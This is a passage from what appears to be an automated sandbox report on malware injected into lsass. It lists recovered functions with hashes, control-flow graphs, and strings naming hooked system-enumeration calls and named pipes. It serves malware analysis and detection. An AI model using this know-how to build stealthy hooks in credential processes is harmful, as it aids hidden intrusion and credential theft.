                                                                    • Instruction ID: 1e1e47678fa7c4b781087d3b5f8b15c943a24ad0d42d65cabc9df2231e8d4def
                                                                    • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction Fuzzy Hash: 1B71A5A6710E918AEB119F76F89CA9923B4FB84BC8F405112DE4E57F69EF2CC844C744
                                                                    Function 000002D6F15112BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                    • String ID: d
                                                                    • API String ID: 2005889112-2564639436
                                                                    • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction ID: 5fb3b21df960b81225b638196f68b2da2c963b60e6c4826c36aa05b26c7c4fc2
                                                                    • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction Fuzzy Hash: B95115B6200B848AEB55CF62F54C35AA7A1F789FD9F144126DE4A07B58DF3CD849CB00
                                                                    Function 000002D6F1511D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                    • API String ID: 4175298099-1975688563
                                                                    • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction ID: acd4e2c9eb3dd1a9bb1b7a25fe6521af63330346e6cf64fc31cecd724e9f3874
                                                                    • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction Fuzzy Hash: C83162E9110E8AA8EE06EFA5F8AE6D46321B7143C4F905017981F23D75DF7C8E4AC760
                                                                    Function 000002D6F14E6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 324 2d6f14e6910-2d6f14e6916 325 2d6f14e6951-2d6f14e695b 324->325 326 2d6f14e6918-2d6f14e691b 324->326 327 2d6f14e6a78-2d6f14e6a8d 325->327 328 2d6f14e6945-2d6f14e6984 call 2d6f14e6fc0 326->328 329 2d6f14e691d-2d6f14e6920 326->329 332 2d6f14e6a8f 327->332 333 2d6f14e6a9c-2d6f14e6ab6 call 2d6f14e6e54 327->333 347 2d6f14e6a52 328->347 348 2d6f14e698a-2d6f14e699f call 2d6f14e6e54 328->348 330 2d6f14e6922-2d6f14e6925 329->330 331 2d6f14e6938 __scrt_dllmain_crt_thread_attach 329->331 335 2d6f14e6931-2d6f14e6936 call 2d6f14e6f04 330->335 336 2d6f14e6927-2d6f14e6930 330->336 339 2d6f14e693d-2d6f14e6944 331->339 337 2d6f14e6a91-2d6f14e6a9b 332->337 345 2d6f14e6aef-2d6f14e6b20 call 2d6f14e7190 333->345 346 2d6f14e6ab8-2d6f14e6aed call 2d6f14e6f7c call 2d6f14e6e1c call 2d6f14e7318 call 2d6f14e7130 call 2d6f14e7154 call 2d6f14e6fac 333->346 335->339 356 2d6f14e6b22-2d6f14e6b28 345->356 357 2d6f14e6b31-2d6f14e6b37 345->357 346->337 351 2d6f14e6a54-2d6f14e6a69 347->351 359 2d6f14e69a5-2d6f14e69b6 call 2d6f14e6ec4 348->359 360 2d6f14e6a6a-2d6f14e6a77 call 2d6f14e7190 348->360 356->357 362 2d6f14e6b2a-2d6f14e6b2c 356->362 363 2d6f14e6b7e-2d6f14e6b94 call 2d6f14e268c 357->363 364 2d6f14e6b39-2d6f14e6b43 357->364 374 2d6f14e69b8-2d6f14e69dc call 2d6f14e72dc call 2d6f14e6e0c call 2d6f14e6e38 call 2d6f14eac0c 359->374 375 2d6f14e6a07-2d6f14e6a11 call 2d6f14e7130 359->375 360->327 369 2d6f14e6c1f-2d6f14e6c2c 362->369 382 2d6f14e6bcc-2d6f14e6bce 363->382 383 2d6f14e6b96-2d6f14e6b98 363->383 370 2d6f14e6b45-2d6f14e6b4d 364->370 371 2d6f14e6b4f-2d6f14e6b5d call 2d6f14f5780 364->371 377 2d6f14e6b63-2d6f14e6b78 call 2d6f14e6910 370->377 371->377 393 2d6f14e6c15-2d6f14e6c1d 371->393 374->375 427 2d6f14e69de-2d6f14e69e5 __scrt_dllmain_after_initialize_c 374->427 375->347 395 2d6f14e6a13-2d6f14e6a1f call 2d6f14e7180 375->395 377->363 377->393 391 2d6f14e6bd5-2d6f14e6bea call 2d6f14e6910 382->391 392 2d6f14e6bd0-2d6f14e6bd3 382->392 383->382 390 2d6f14e6b9a-2d6f14e6bbc call 2d6f14e268c call 2d6f14e6a78 383->390 390->382 421 2d6f14e6bbe-2d6f14e6bc6 call 2d6f14f5780 390->421 391->393 406 2d6f14e6bec-2d6f14e6bf6 391->406 392->391 392->393 393->369 414 2d6f14e6a45-2d6f14e6a50 395->414 415 2d6f14e6a21-2d6f14e6a2b call 2d6f14e7098 395->415 411 2d6f14e6c01-2d6f14e6c11 call 2d6f14f5780 406->411 412 2d6f14e6bf8-2d6f14e6bff 406->412 411->393 412->393 414->351 415->414 426 2d6f14e6a2d-2d6f14e6a3b 415->426 421->382 426->414 427->375 428 2d6f14e69e7-2d6f14e6a04 call 2d6f14eabc8 427->428 428->375
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440487740.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f14e0000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                    • API String ID: 190073905-1786718095
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: a6791069ef224389268787c1cde3096a7f5d96d964d78a2d6507250396e19ec1
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: A681EF61A00E018EFA54EB66B44D3A966E1ABC57C0F54812B9A1B47F9FDF3CCE458B00
                                                                    Function 000002D6F151CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 000002D6F151CE37
                                                                    • FlsGetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CE4C
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CE6D
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CE9A
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CEAB
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CEBC
                                                                    • SetLastError.KERNEL32 ref: 000002D6F151CED7
                                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CF0D
                                                                    • FlsSetValue.KERNEL32(?,?,00000001,000002D6F151ECCC,?,?,?,?,000002D6F151BF9F,?,?,?,?,?,000002D6F1517AB0), ref: 000002D6F151CF2C
                                                                      • Part of subcall function 000002D6F151D6CC: HeapAlloc.KERNEL32 ref: 000002D6F151D721
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CF54
                                                                      • Part of subcall function 000002D6F151D744: HeapFree.KERNEL32 ref: 000002D6F151D75A
                                                                      • Part of subcall function 000002D6F151D744: GetLastError.KERNEL32 ref: 000002D6F151D764
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CF65
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CF76
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast$Heap$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 570795689-0
                                                                    • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction ID: cbe95e8add907aa0b2c73cf7f4231efe5140574644f478dc5db001f93a5baefd
                                                                    • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction Fuzzy Hash: C4410EE0301E444EFE6BAF35755E36962429B447F0F240B27A93F6AED6DE2DDC418600
                                                                    Function 000002D6F1512244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                    • API String ID: 2171963597-1373409510
                                                                    • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction ID: 16cc91b0a522ba52fd30a106300581a7bfe1bf7e397ef6e488c8d9df07b3eb6a
                                                                    • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction Fuzzy Hash: 44212CB6614B8086FB108B25F44C76A77A1F789BE5F504216EA5E03FA8DF7CC949CB00
                                                                    Function 000002D6F151A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 703 2d6f151a544-2d6f151a5ac call 2d6f151b414 706 2d6f151a5b2-2d6f151a5b5 703->706 707 2d6f151aa13-2d6f151aa1b call 2d6f151c748 703->707 706->707 709 2d6f151a5bb-2d6f151a5c1 706->709 711 2d6f151a5c7-2d6f151a5cb 709->711 712 2d6f151a690-2d6f151a6a2 709->712 711->712 713 2d6f151a5d1-2d6f151a5dc 711->713 714 2d6f151a6a8-2d6f151a6ac 712->714 715 2d6f151a963-2d6f151a967 712->715 713->712 717 2d6f151a5e2-2d6f151a5e7 713->717 714->715 716 2d6f151a6b2-2d6f151a6bd 714->716 718 2d6f151a969-2d6f151a970 715->718 719 2d6f151a9a0-2d6f151a9aa call 2d6f1519634 715->719 716->715 720 2d6f151a6c3-2d6f151a6ca 716->720 717->712 721 2d6f151a5ed-2d6f151a5f7 call 2d6f1519634 717->721 718->707 722 2d6f151a976-2d6f151a99b call 2d6f151aa1c 718->722 719->707 731 2d6f151a9ac-2d6f151a9cb call 2d6f1517940 719->731 724 2d6f151a6d0-2d6f151a707 call 2d6f1519a10 720->724 725 2d6f151a894-2d6f151a8a0 720->725 721->731 736 2d6f151a5fd-2d6f151a628 call 2d6f1519634 * 2 call 2d6f1519d24 721->736 722->719 724->725 740 2d6f151a70d-2d6f151a715 724->740 725->719 732 2d6f151a8a6-2d6f151a8aa 725->732 733 2d6f151a8ac-2d6f151a8b8 call 2d6f1519ce4 732->733 734 2d6f151a8ba-2d6f151a8c2 732->734 733->734 747 2d6f151a8db-2d6f151a8e3 733->747 734->719 739 2d6f151a8c8-2d6f151a8d5 call 2d6f15198b4 734->739 771 2d6f151a648-2d6f151a652 call 2d6f1519634 736->771 772 2d6f151a62a-2d6f151a62e 736->772 739->719 739->747 745 2d6f151a719-2d6f151a74b 740->745 749 2d6f151a887-2d6f151a88e 745->749 750 2d6f151a751-2d6f151a75c 745->750 752 2d6f151a8e9-2d6f151a8ed 747->752 753 2d6f151a9f6-2d6f151aa12 call 2d6f1519634 * 2 call 2d6f151c6a8 747->753 749->725 749->745 750->749 754 2d6f151a762-2d6f151a77b 750->754 756 2d6f151a900 752->756 757 2d6f151a8ef-2d6f151a8fe call 2d6f1519ce4 752->757 753->707 758 2d6f151a781-2d6f151a7c6 call 2d6f1519cf8 * 2 754->758 759 2d6f151a874-2d6f151a879 754->759 767 2d6f151a903-2d6f151a90d call 2d6f151b4ac 756->767 757->767 786 2d6f151a7c8-2d6f151a7ee call 2d6f1519cf8 call 2d6f151ac38 758->786 787 2d6f151a804-2d6f151a80a 758->787 764 2d6f151a884 759->764 764->749 767->719 779 2d6f151a913-2d6f151a961 call 2d6f1519944 call 2d6f1519b50 767->779 771->712 785 2d6f151a654-2d6f151a674 call 2d6f1519634 * 2 call 2d6f151b4ac 771->785 772->771 777 2d6f151a630-2d6f151a63b 772->777 777->771 783 2d6f151a63d-2d6f151a642 777->783 779->719 783->707 783->771 809 2d6f151a676-2d6f151a680 call 2d6f151b59c 785->809 810 2d6f151a68b 785->810 803 2d6f151a7f0-2d6f151a802 786->803 804 2d6f151a815-2d6f151a872 call 2d6f151a470 786->804 791 2d6f151a87b 787->791 792 2d6f151a80c-2d6f151a810 787->792 797 2d6f151a880 791->797 792->758 797->764 803->786 803->787 804->797 813 2d6f151a686-2d6f151a9ef call 2d6f15192ac call 2d6f151aff4 call 2d6f15194a0 809->813 814 2d6f151a9f0-2d6f151a9f5 call 2d6f151c6a8 809->814 810->712 813->814 814->753
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction ID: c723f1f196541d97861d438692a693aba2ea927f234d4d4577a4b0ac93f6314a
                                                                    • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction Fuzzy Hash: C6E15DB6604B808AEB629FA5E44C39D77A0F745BD8F100517EE8E67F99CB38D991C700
                                                                    Function 000002D6F14E9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 582 2d6f14e9944-2d6f14e99ac call 2d6f14ea814 585 2d6f14e99b2-2d6f14e99b5 582->585 586 2d6f14e9e13-2d6f14e9e1b call 2d6f14ebb48 582->586 585->586 587 2d6f14e99bb-2d6f14e99c1 585->587 589 2d6f14e9a90-2d6f14e9aa2 587->589 590 2d6f14e99c7-2d6f14e99cb 587->590 592 2d6f14e9d63-2d6f14e9d67 589->592 593 2d6f14e9aa8-2d6f14e9aac 589->593 590->589 594 2d6f14e99d1-2d6f14e99dc 590->594 597 2d6f14e9da0-2d6f14e9daa call 2d6f14e8a34 592->597 598 2d6f14e9d69-2d6f14e9d70 592->598 593->592 595 2d6f14e9ab2-2d6f14e9abd 593->595 594->589 596 2d6f14e99e2-2d6f14e99e7 594->596 595->592 600 2d6f14e9ac3-2d6f14e9aca 595->600 596->589 601 2d6f14e99ed-2d6f14e99f7 call 2d6f14e8a34 596->601 597->586 608 2d6f14e9dac-2d6f14e9dcb call 2d6f14e6d40 597->608 598->586 602 2d6f14e9d76-2d6f14e9d9b call 2d6f14e9e1c 598->602 604 2d6f14e9c94-2d6f14e9ca0 600->604 605 2d6f14e9ad0-2d6f14e9b07 call 2d6f14e8e10 600->605 601->608 616 2d6f14e99fd-2d6f14e9a28 call 2d6f14e8a34 * 2 call 2d6f14e9124 601->616 602->597 604->597 609 2d6f14e9ca6-2d6f14e9caa 604->609 605->604 620 2d6f14e9b0d-2d6f14e9b15 605->620 613 2d6f14e9cac-2d6f14e9cb8 call 2d6f14e90e4 609->613 614 2d6f14e9cba-2d6f14e9cc2 609->614 613->614 626 2d6f14e9cdb-2d6f14e9ce3 613->626 614->597 619 2d6f14e9cc8-2d6f14e9cd5 call 2d6f14e8cb4 614->619 649 2d6f14e9a2a-2d6f14e9a2e 616->649 650 2d6f14e9a48-2d6f14e9a52 call 2d6f14e8a34 616->650 619->597 619->626 624 2d6f14e9b19-2d6f14e9b4b 620->624 628 2d6f14e9b51-2d6f14e9b5c 624->628 629 2d6f14e9c87-2d6f14e9c8e 624->629 632 2d6f14e9ce9-2d6f14e9ced 626->632 633 2d6f14e9df6-2d6f14e9e12 call 2d6f14e8a34 * 2 call 2d6f14ebaa8 626->633 628->629 634 2d6f14e9b62-2d6f14e9b7b 628->634 629->604 629->624 635 2d6f14e9d00 632->635 636 2d6f14e9cef-2d6f14e9cfe call 2d6f14e90e4 632->636 633->586 637 2d6f14e9c74-2d6f14e9c79 634->637 638 2d6f14e9b81-2d6f14e9bc6 call 2d6f14e90f8 * 2 634->638 646 2d6f14e9d03-2d6f14e9d0d call 2d6f14ea8ac 635->646 636->646 642 2d6f14e9c84 637->642 663 2d6f14e9c04-2d6f14e9c0a 638->663 664 2d6f14e9bc8-2d6f14e9bee call 2d6f14e90f8 call 2d6f14ea038 638->664 642->629 646->597 661 2d6f14e9d13-2d6f14e9d61 call 2d6f14e8d44 call 2d6f14e8f50 646->661 649->650 654 2d6f14e9a30-2d6f14e9a3b 649->654 650->589 667 2d6f14e9a54-2d6f14e9a74 call 2d6f14e8a34 * 2 call 2d6f14ea8ac 650->667 654->650 659 2d6f14e9a3d-2d6f14e9a42 654->659 659->586 659->650 661->597 671 2d6f14e9c0c-2d6f14e9c10 663->671 672 2d6f14e9c7b 663->672 682 2d6f14e9c15-2d6f14e9c72 call 2d6f14e9870 664->682 683 2d6f14e9bf0-2d6f14e9c02 664->683 687 2d6f14e9a8b 667->687 688 2d6f14e9a76-2d6f14e9a80 call 2d6f14ea99c 667->688 671->638 673 2d6f14e9c80 672->673 673->642 682->673 683->663 683->664 687->589 692 2d6f14e9df0-2d6f14e9df5 call 2d6f14ebaa8 688->692 693 2d6f14e9a86-2d6f14e9def call 2d6f14e86ac call 2d6f14ea3f4 call 2d6f14e88a0 688->693 692->633 693->692
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440487740.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f14e0000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction ID: d823906c8357baff7e49bf9f9c1525c5136429e0f71f4035b6608ff5472b74b6
                                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction Fuzzy Hash: 11E16C72604B808EEB60DF65E49C39D77A0F795BD8F100516EE8A97F99CB38CA91C700
                                                                    Function 000002D6F151F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3013587201-537541572
                                                                    • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction ID: 261ecf9bf2a1f0678fa278aa22b30c90f33c111913abcd05092592ff9b1f8fec
                                                                    • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                    • Instruction Fuzzy Hash: B44192A2311E409AEA1BCF26B84C7566395B749BE0F5941279D1FA7F84EE3CCC498350
                                                                    Function 000002D6F151104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                    • String ID: d
                                                                    • API String ID: 3743429067-2564639436
                                                                    • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction ID: 7c308a324f3a3b915ae5c740d95f6965976605312a1237647059209b5cbc419f
                                                                    • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                    • Instruction Fuzzy Hash: AC413D73614F84CAEB61CF21E44879AB7A1F388B98F54811ADA8A17B58DF3CD945CB40
                                                                    Function 000002D6F151D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FlsGetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D087
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D0A6
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D0CE
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D0DF
                                                                    • FlsSetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D0F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID: 1%$Y%
                                                                    • API String ID: 3702945584-1395475152
                                                                    • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction ID: 2480a359072ec50eb541e18d4b91d9545f280b7cfca78c1f54feae84ed9f0741
                                                                    • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                    • Instruction Fuzzy Hash: A61103E0705E444AFA6A5F36755E36962429B447F0F144727983F67EDAEE2CDC428600
                                                                    Function 000002D6F1517510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID:
                                                                    • API String ID: 190073905-0
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: 9e9a13fecbd3ee6dd4b9af7d8544c3df26673650e91134e0a1763e142b039acf
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: 8A81B0E1600E418EFB56AF6DB84D3992691A7857C0F544827AA0F67F97EB7CCC468700
                                                                    Function 000002D6F1519DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                    • String ID: api-ms-
                                                                    • API String ID: 2559590344-2084034818
                                                                    • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction ID: 1b9a7946070453fa793877a5e81080cf6b3e7f40ad096b1fe8965e9392f62bd4
                                                                    • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                    • Instruction Fuzzy Hash: E331A3A2212E40EDEE17DF42F41C7552294B748BE4F590A269D2F1BB94EF3DC8858310
                                                                    Function 000002D6F1523DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                    • String ID: CONOUT$
                                                                    • API String ID: 3230265001-3130406586
                                                                    • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction ID: f7805de5885bb23c4ed2acbf2a3bac675694138274e2d29da4d1e0af9514ac00
                                                                    • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                    • Instruction Fuzzy Hash: D8112BA2210FC08AE7908B56F85D71966A0F788FE4F144226EE5F87B94DB7CC9158744
                                                                    Function 000002D6F1513790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
